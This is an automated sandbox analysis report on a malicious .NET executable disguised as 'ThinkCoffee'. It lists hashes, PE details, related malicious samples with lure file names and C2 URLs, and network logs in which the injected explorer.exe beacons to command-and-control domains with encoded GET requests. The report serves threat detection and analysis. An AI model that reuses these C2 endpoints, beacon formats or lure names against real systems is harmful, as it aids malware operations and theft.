neu-consumerrp-displaycatalog-aks2aks-europe.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big: too many NtAllocateVirtualMemory calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.

                                        Simulations

                                        Behavior and APIs

Time | Type | Description
08:57:13 | API Interceptor | 1x Sleep call for process: XhU4EXUp0x.exe modified

                                        Joe Sandbox View / Context

                                        IPs

Match: 66.235.200.146

Associated Sample Name / URL | Detection | Context
New Purchase Order20210609.exe | malicious | www.anderson-anderson.com/un8c/?6lGd=HBZ81PLPUzqhOj&3f-H3H=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilL37bAvbTVrR
packa.....(1).exe | malicious | www.apexpioneer.com/wdva/?kfD4qZ=qWl9Mj/s+HilBOtVYaSZVR6j4m9BeajRzFuKOkq+ALHs1EAUycBQc15lgYPA8iZZOcHD&kr0=dbF0vFoPNvL
New order 201534.pdf.exe | malicious | www.thedailymino.com/sbqi/?8pdPxFYX=jXb6weh8fwwMUEgPJJl7RJ0MRYZqFSz6owdMJ8CEOPRP4uFAZVBZ7eXod2M1Xtzg6qh0&_FNlAt=tVEl9tDHXfB4
New Order_PO 1164_HD-F 4020 6K.exe | malicious | www.anderson-anderson.com/un8c/?D8ODAr=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilIXrUh/jNwCW&mJ=V6AHzvxh
New Order_PO 1164_HD-F 4020 6K.exe | malicious | www.anderson-anderson.com/un8c/?Lh0l=EENVCx8DcYxC77hOTbV1SAybrq7ihI4TvqnYxLujxv6ep3jMUAI9807ilIXrUh/jNwCW&VTKh=vBZtYDQXqZ4DGn
y6f8O0kbEB.exe | malicious | www.taratakeson.com/oerg/?ndndnZ=UtWlYrO0rhjH&mHLD_0=dr4pMwcdhZcmPSbPHAIEo/sox+gcSbBb1FVNS74e5R2NObgAqDDHvg7Hj8ybvDNWoVhE
bibviv.exe | malicious | www.milkweedmagic.com/vns/
INVOICE PAYMENT.exe | malicious | www.milkweedmagic.com/vns/?nloHn6=zPqtcJu8h&OH5LRV=dxIiDTMmZIUelDEuKFBNrZVGQoGe1rqzTAT6E2MP4OmWiXtk9zOjG3OmaVxdpx2vqn8e
BL Draft copy.exe | malicious | www.smallpeo.com/sx8c/?inzXrV1h=CQJBYFRSx3Pkz4hmjXzNOjG1WISSVLs1fX4LX3HiJ6zoF9rBVgsTdld9Os8/rzow8SJA&SP=cnxT3HrH
2os1TIXTXk.exe | malicious | www.iidiotproof.com/mdi/?Yn=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqYOF+JlL3+nX&mvKtg=Y4C4_fDHvx98fJ5
03102021.xls | malicious | baxtercode.com/qkhpnucmzts/44267.5622407407.dat
03102021.xls | malicious | baxtercode.com/qkhpnucmzts/44267.5507399306.dat
03102021.xls | malicious | baxtercode.com/qkhpnucmzts/44267.5414023148.dat
orii11.exe | malicious | www.iidiotproof.com/mdi/?ndn4iL=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqbu/uYFztZGQ&OR9=uTypBLyh3rCtd
orii11.exe | malicious | www.iidiotproof.com/mdi/?8pp=490O4/0fh9aUX7Eo1RdW8uGCBI43DKhy4NK5PQpMhOFz6rL2znJpXpofqYOvh5VLz8vX&sZCx=1bYdfPf8ef5pjPm
PO.x00991882822.xlsm | malicious | www.rmpclean.com/private/?-ZL=kjFT_jlXCZeHrh&FVTt=Uhbi9DfUBq2i/1fkh0yGI21N5OQMN5zBtkTJbOEZT9D8cf6FKtFeyjvu/14BaEQ5k4UB
Parcel _009887 .exe | malicious | www.ocicoxford.com/csw6/?t8bHuZw=efwaGXT9IzbmNtOzDnCu+48vppNLQWQKGJFN33tYCz0tX5X/vDpmiH8bd6jrvtNwDjI3p9k8/g==&2d=llsp
P.O-DT1692.exe | malicious | www.drtarver.com/g65/?hL0=/G2o2cr0v4Q8hBBM9UJDjH+yY22wUVLVeIfqLGL5GIR6ySKGryVcUhqqpJFQ9LO6Iwep&Wr=LhnLHrv8d
SAMSUNG C&T UPCOMING PROJECTS19-MP.exe.exe | malicious | www.elrodeorestaurantbw.com/cdl/?Mfg=/L1lIqGS5r2x+RFPi+XkQGVOlUslsJfdMM9Npew4xv9wNb7VMt18zc8R4PiLn7n17TkB&uVxpj=ojO0dJYX1B
AWB_SHIPPING_DOCUMENT_pdf.exe | malicious | www.lincolnreadymeals.com/me2z/?absDxBr=WOPwKhxv/yLwNDnXBLmuN1eR3SzsT6kHFNnvJn0nwfrdF7aBYBJOwB9MozwDSP7grAKd&pPX=EFQpsLbPFZvt

                                        Domains

                                        No context

                                        ASN

Match: CLOUDFLARENETUS

Associated Sample Name / URL | Detection | Context
1VTzed95Tz.exe | malicious | 104.21.45.72
DHL AWB TRACKING DETAILS.exe | malicious | 104.21.19.200
Proforma Invoice.exe | malicious | 104.21.19.200
TLUN2Qvsx2.exe | malicious | 104.23.98.190
rL2F1mjb2l.exe | malicious | 104.23.99.190
tvijATOn6L.exe | malicious | 104.23.99.190
8964532115.exe | malicious | 172.67.188.154
DHL_2761228.exe | malicious | 162.159.133.233
0900988099900000.exe | malicious | 172.67.188.154
Payment Advice.exe | malicious | 104.21.19.200
VM64DGCRMN5XGK.htm | malicious | 104.16.18.94
1EFNborqwh.dll | malicious | 104.20.185.68
OrderKLB210568.exe | malicious | 104.16.13.194
Purchase_Order.exe | malicious | 104.21.64.212
main_setup_x86x64.exe | malicious | 172.67.188.69
b9f5bca9a22f08aad48674bc42e4eaf72ab8aa3d652ba.exe | malicious | 104.26.9.187
LsWgkxVLk1.dll | malicious | 104.20.184.68
HHHyXsu7Vj.dll | malicious | 104.20.184.68
7Nboq835Fc.exe | malicious | 104.21.19.200
moq fob order.exe | malicious | 172.67.188.154

Match: LEASEWEB-USA-SEA-10US

Associated Sample Name / URL | Detection | Context
Product_Samples.exe | malicious | 23.82.229.141
RFQ_BRAT_METAL_TECH_LTD.exe | malicious | 23.82.229.141
Airwaybill # 6913321715.exe | malicious | 23.82.149.3
8UsA.sh | malicious | 172.241.159.235
493bfe21_by_Libranalysis.exe | malicious | 23.82.149.3
PAGO 50,867.00 USD (ANTICIPO) 23042021 DOC-20204207MT-1.exe | malicious | 23.82.229.141
Rio International LLC URGENT REQUEST FOR QUOTATION.exe | malicious | 23.82.229.141
NEW ORDER ELO-05756485.exe | malicious | 23.82.149.10
OC CVE9362 _TVOP-MIO 22(C) 2021,pdf.exe | malicious | 23.82.230.186
order samples 056-059_pdf.exe | malicious | 23.82.225.149
order samples 056-062 _pdf.exe | malicious | 23.82.225.149
OPSzlwylj5.exe | malicious | 173.234.15.207
BSG_ptf.exe | malicious | 23.82.225.149
FeDex Shipment Confirmation.exe | malicious | 23.82.229.136
FeDex Shipment Confirmation.exe | malicious | 23.82.229.136
yqfUONVqpk.exe | malicious | 173.234.15.207
sntU1XoQa3.exe | malicious | 173.234.15.207
vvUkaRlJUJ.exe | malicious | 173.234.15.207
ZRz0Aq1Rf0.dll | malicious | 23.82.78.4
hkcmd.exe | malicious | 173.234.15.207

                                        JA3 Fingerprints

                                        No context

                                        Dropped Files

                                        No context

                                        Created / dropped Files

                                        C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\XhU4EXUp0x.exe.log
Process: C:\Users\user\Desktop\XhU4EXUp0x.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1406
Entropy (8bit): 5.341099307467139
Encrypted: false
SSDEEP: 24:MLU84jE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4sAmER:MgvjHK5HKXE1qHiYHKhQnoPtHoxHhAHg
MD5: E5FA1A53BA6D70E18192AF6AF7CFDBFA
SHA1: 1C076481F11366751B8DA795C98A54DE8D1D82D5
SHA-256: 1D7BAA6D3EB5A504FD4652BC01A0864DEE898D35D9E29D03EB4A60B0D6405D83
SHA-512: 77850814E24DB48E3DDF9DF5B6A8110EE1A823BAABA800F89CD353EAC7F72E48B13F3F4A4DC8E5F0FAA707A7F14ED90577CF1CB106A0422F0BEDD1EFD2E940E4
Malicious: true
Reputation: moderate, very likely benign file
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

                                        Static File Info

                                        General

                                        File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                        Entropy (8bit): 7.6744819259251145
                                        TrID:
                                        • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                        • Win32 Executable (generic) a (10002005/4) 49.75%
                                        • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                        • Windows Screen Saver (13104/52) 0.07%
                                        • Generic Win/DOS Executable (2004/3) 0.01%
                                        File name: XhU4EXUp0x.exe
                                        File size: 907264
                                        MD5: 49c83eceb8a816b959a778e5f2e78801
                                        SHA1: ead9055c813de47edfec5bc46a0d896df4b4af2e
                                        SHA256: 2f4d0e2ce90ab2c35dcba4c85e38346eae6ac2cef0f939ccdd21cade4d6343ca
                                        SHA512: 09b42603c00de62fe0426f202a6809c0d7ed2164f6e3da1ab124a9d02e75eea115a2ad650905a2df4e9d9bbdb4347c4283eed1c161cfdf549713cbb46ca6a6d1
                                        SSDEEP: 24576:EE4VwfX9zrNeBUdtEqTGokrWc4eJNPs2ruVc:EE4VwfX9PwBU8rWc5rGc
                                        File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......`..............P.................. ........@.. .......................@............@................................

                                        File Icon

                                        Icon Hash: 00828e8e8686b000

                                        Static PE Info

                                        General

                                        Entrypoint: 0x4decea
                                        Entrypoint Section: .text
                                        Digitally signed: false
                                        Imagebase: 0x400000
                                        Subsystem: windows gui
                                        Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
                                        DLL Characteristics: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                        Time Stamp: 0x60C3DF04 [Fri Jun 11 22:09:08 2021 UTC]
                                        TLS Callbacks:
                                        CLR (.Net) Version: v4.0.30319
                                        OS Version Major: 4
                                        OS Version Minor: 0
                                        File Version Major: 4
                                        File Version Minor: 0
                                        Subsystem Version Major: 4
                                        Subsystem Version Minor: 0
                                        Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

                                        Entrypoint Preview

                                        Instruction
                                        jmp dword ptr [00402000h]
                                        add byte ptr [eax], al

                                        Data Directories

                                        Name | Virtual Address | Virtual Size | Is in Section
                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0xdec98 | 0x4f | .text
                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xe0000 | 0x5dc | .rsrc
                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xe2000 | 0xc | .reloc
                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0xdeb60 | 0x1c | .text
                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                        Sections

                                        Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                        .text | 0x2000 | 0xdccf0 | 0xdce00 | False | 0.803978980971 | data | 7.68116376135 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                        .rsrc | 0xe0000 | 0x5dc | 0x600 | False | 0.426432291667 | data | 4.164077085 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                        .reloc | 0xe2000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                        Resources

                                        Name | RVA | Size | Type | Language | Country
                                        RT_VERSION | 0xe0090 | 0x34c | data | |
                                        RT_MANIFEST | 0xe03ec | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                        Imports

                                        DLL | Import
                                        mscoree.dll | _CorExeMain

                                        Version Infos

                                        Description | Data
                                        Translation | 0x0000 0x04b0
                                        LegalCopyright | Copyright 2017
                                        Assembly Version | 1.0.0.0
                                        InternalName | ProfileOptimization.exe
                                        FileVersion | 1.0.0.0
                                        CompanyName |
                                        LegalTrademarks |
                                        Comments |
                                        ProductName | ThinkCoffee
                                        ProductVersion | 1.0.0.0
                                        FileDescription | ThinkCoffee
                                        OriginalFilename | ProfileOptimization.exe

                                        Network Behavior

                                        Network Port Distribution

                                        TCP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jun 12, 2021 08:58:45.443835974 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:58:45.486952066 CEST | 80 | 49762 | 66.235.200.146 | 192.168.2.4
                                        Jun 12, 2021 08:58:45.487123966 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:58:45.487462997 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:58:45.529809952 CEST | 80 | 49762 | 66.235.200.146 | 192.168.2.4
                                        Jun 12, 2021 08:58:45.999707937 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:58:46.042366028 CEST | 80 | 49762 | 66.235.200.146 | 192.168.2.4
                                        Jun 12, 2021 08:58:46.042442083 CEST | 49762 | 80 | 192.168.2.4 | 66.235.200.146
                                        Jun 12, 2021 08:59:06.257075071 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.451848030 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.452025890 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.452203989 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.651827097 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.651859045 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.651873112 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.651887894 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.652347088 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.652540922 CEST | 49765 | 80 | 192.168.2.4 | 23.82.229.132
                                        Jun 12, 2021 08:59:06.847349882 CEST | 80 | 49765 | 23.82.229.132 | 192.168.2.4

                                        UDP Packets

                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Jun 12, 2021 08:57:05.901299000 CEST | 53157 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:05.951527119 CEST | 53 | 53157 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:06.667735100 CEST | 58028 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:06.718683958 CEST | 53 | 58028 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:07.914366961 CEST | 53097 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:07.965502977 CEST | 53 | 53097 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:08.203623056 CEST | 49257 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:08.266376972 CEST | 53 | 49257 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:09.575119019 CEST | 62389 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:09.634443998 CEST | 53 | 62389 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:10.707788944 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:10.769614935 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:11.819053888 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:11.882215023 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:12.799154043 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:12.860248089 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:13.952930927 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:14.003428936 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:14.747575045 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:14.797682047 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:15.725955009 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:15.786371946 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:16.712888956 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:16.763209105 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:17.877006054 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:17.933020115 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:19.560508013 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:19.620259047 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:20.493185043 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:20.545531988 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:21.318283081 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:21.368737936 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:22.212704897 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:22.262896061 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:23.036264896 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:23.086296082 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:23.833759069 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:23.884001970 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:24.777329922 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:24.838646889 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:25.728360891 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:25.786494970 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:35.281550884 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:35.343091011 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:58.055152893 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:58.217106104 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:57:59.370914936 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:57:59.433738947 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:00.118191004 CEST | 49612 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:00.274250031 CEST | 53 | 49612 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:00.799945116 CEST | 49285 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:00.861430883 CEST | 53 | 49285 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:01.438102007 CEST | 50601 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:01.506112099 CEST | 53 | 50601 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:01.673754930 CEST | 60875 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:01.674573898 CEST | 56448 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:01.727037907 CEST | 53 | 60875 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:01.744715929 CEST | 53 | 56448 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:02.097090006 CEST | 59172 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:02.161220074 CEST | 53 | 59172 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:02.846249104 CEST | 62420 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:02.908121109 CEST | 53 | 62420 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:03.773226023 CEST | 60579 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:03.833061934 CEST | 53 | 60579 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:08.391108036 CEST | 50183 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:08.449613094 CEST | 53 | 50183 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:08.876105070 CEST | 61531 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:08.934951067 CEST | 53 | 61531 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:17.089121103 CEST | 49228 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:17.150459051 CEST | 53 | 49228 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:45.281604052 CEST | 59794 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:45.436830044 CEST | 53 | 59794 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:56.410811901 CEST | 55916 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:56.483880043 CEST | 53 | 55916 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:58:58.555881023 CEST | 52752 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:58:58.626697063 CEST | 53 | 52752 | 8.8.8.8 | 192.168.2.4
                                        Jun 12, 2021 08:59:06.180969000 CEST | 60542 | 53 | 192.168.2.4 | 8.8.8.8
                                        Jun 12, 2021 08:59:06.255776882 CEST | 53 | 60542 | 8.8.8.8 | 192.168.2.4

                                        DNS Queries

                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                        Jun 12, 2021 08:58:45.281604052 CEST | 192.168.2.4 | 8.8.8.8 | 0x2a48 | Standard query (0) | www.gentrypartyof8.com | A (IP address) | IN (0x0001)
                                        Jun 12, 2021 08:59:06.180969000 CEST | 192.168.2.4 | 8.8.8.8 | 0x4b68 | Standard query (0) | www.rsyueda.com | A (IP address) | IN (0x0001)

                                        DNS Answers

                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                        Jun 12, 2021 08:57:05.951527119 CEST | 8.8.8.8 | 192.168.2.4 | 0x52b2 | No error (0) | a-0019.a.dns.azurefd.net | a-0019.standard.a-msedge.net | | CNAME (Canonical name) | IN (0x0001)
                                        Jun 12, 2021 08:58:45.436830044 CEST | 8.8.8.8 | 192.168.2.4 | 0x2a48 | No error (0) | www.gentrypartyof8.com | gentrypartyof8.com | | CNAME (Canonical name) | IN (0x0001)
                                        Jun 12, 2021 08:58:45.436830044 CEST | 8.8.8.8 | 192.168.2.4 | 0x2a48 | No error (0) | gentrypartyof8.com | | 66.235.200.146 | A (IP address) | IN (0x0001)
                                        Jun 12, 2021 08:59:06.255776882 CEST | 8.8.8.8 | 192.168.2.4 | 0x4b68 | No error (0) | www.rsyueda.com | | 23.82.229.132 | A (IP address) | IN (0x0001)

                                        HTTP Request Dependency Graph

                                        • www.gentrypartyof8.com
                                        • www.rsyueda.com

                                        HTTP Packets

                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        0 | 192.168.2.4 | 49762 | 66.235.200.146 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jun 12, 2021 08:58:45.487462997 CEST | 8357 | OUT | GET /nff/?2dWD=oo8PZR09GamqRkCLHSTg5AKJvm44C+19X1uEOPW4zTuWS3c9RrL+Vx+B8IkF2PxixF5c&7nSX=f2MHEhOHwH HTTP/1.1
                                        Host: www.gentrypartyof8.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:


                                        Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
                                        1 | 192.168.2.4 | 49765 | 23.82.229.132 | 80 | C:\Windows\explorer.exe
                                        Timestamp | kBytes transferred | Direction | Data
                                        Jun 12, 2021 08:59:06.452203989 CEST | 8377 | OUT | GET /nff/?2dWD=rcekcafpraO0sj/oaoDcLlLwOdzHntpmaKyMQqwrcrTR8fOv+tmqTlrKj/r2WTcjy7/L&7nSX=f2MHEhOHwH HTTP/1.1
                                        Host: www.rsyueda.com
                                        Connection: close
                                        Data Raw: 00 00 00 00 00 00 00
                                        Data Ascii:
                                        Jun 12, 2021 08:59:06.651827097 CEST | 8378 | IN | HTTP/1.1 500 Internal Server Error
                                        Cache-Control: private
                                        Content-Type: text/html; charset=utf-8
                                        Server: Microsoft-IIS/8.5
                                        X-AspNet-Version: 4.0.30319
                                        X-Powered-By: ASP.NET
                                        Access-Control-Allow-Origin: *
                                        Access-Control-Allow-Headers: *
                                        Access-Control-Allow-Methods: GET, POST, PUT, DELETE
                                        Date: Sat, 12 Jun 2021 06:59:03 GMT
                                        Connection: close
                                        Content-Length: 4082
                                        Data Raw: [hex dump omitted; decoded content follows in Data Ascii]
                                        Data Ascii: <!DOCTYPE html><html> <head> <title></title> <meta name="viewport" content="width=device-width" /> <style> body {font-family:"Verdana";font-weight:normal;font-size: .7em;color:black;} p {font-family:"Verdana";font-weight:normal;color:black;margin-top: -5px} b {font-family:"Verdana";font-weight:bold;color:black;margin-top: -5px} H1 { font-family:"Verdana";font-weight:normal;font-size:18pt;color:red } H2 { font-family:"Verdana";font-weight:normal;font-size:14pt;color:maroon } pre {font-family:"Consolas","Lucida Console",Monospace;font-size:11pt;margin:0;padding:0.5em;line-height:14pt} .marker {font-weight: bold; color: black;text-decoration: none;} .version {color: gray;} .error {margin-bottom: 10px;} .expandable { text-decoration:underline; font-weight:bold; color:navy;
